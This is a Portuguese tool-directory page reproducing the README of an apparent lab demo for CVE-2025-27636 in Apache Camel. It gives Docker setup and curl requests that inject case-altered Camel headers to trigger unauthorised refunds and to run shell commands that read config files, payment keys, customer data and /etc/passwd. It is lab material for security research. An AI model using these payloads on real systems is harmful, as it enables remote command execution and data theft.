Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/crystallen1/cve-2025-27636-demo
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

Demonstra o CVE-2025-27636 do Apache Camel com reprodução baseada em Docker de ataques de injeção de cabeçalhos, incluindo injeção de método de bean e execução de comandos para pesquisa e educação em segurança.

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Demonstração de CVE do Apache Camel

Este projeto demonstra vulnerabilidades de segurança no Apache Camel relacionadas a ataques de injeção de cabeçalho.

Build Docker

Crie a imagem Docker:

root@kitploit:~
docker build -t camel-cve-demo .

Execução Docker

Execute o contêiner com todas as portas necessárias:

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

Reprodução do Ataque

1. Ataque de Injeção de Método Bean

Explore o endpoint vulnerável injetando nomes de métodos:

root@kitploit:~
# Ataque bem-sucedido - cabeçalho sensível a maiúsculas/minúsculas
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternativa - injeção por parâmetro de consulta
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

Comparação (estes devem falhar):

root@kitploit:~
# Maiúsculas/minúsculas incorretas - não deve funcionar
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. Ataque de Execução de Comandos

Explore o componente exec para executar comandos arbitrários:

Reconhecimento:

root@kitploit:~
# Verificar diretório atual
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# Listar diretório de configuração
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Encontrar arquivos de configuração
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

Exfiltração de Dados:

root@kitploit:~
# Ler configuração do banco de dados
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Ler segredos de pagamento
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Ler dados de clientes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Ler logs de auditoria
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Ler usuários do sistema
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# Listar processos
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

Verificar Resultados do Ataque

Verifique os logs de ataque dentro do contêiner:

root@kitploit:~

# Visualizar tentativas de reembolso não autorizadas
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

Portas

  • 8080: Aplicação principal (frontend)
  • 8081: Endpoint vulnerável a injeção de bean
  • 8484: Endpoint vulnerável a injeção de exec
Baixar ferramenta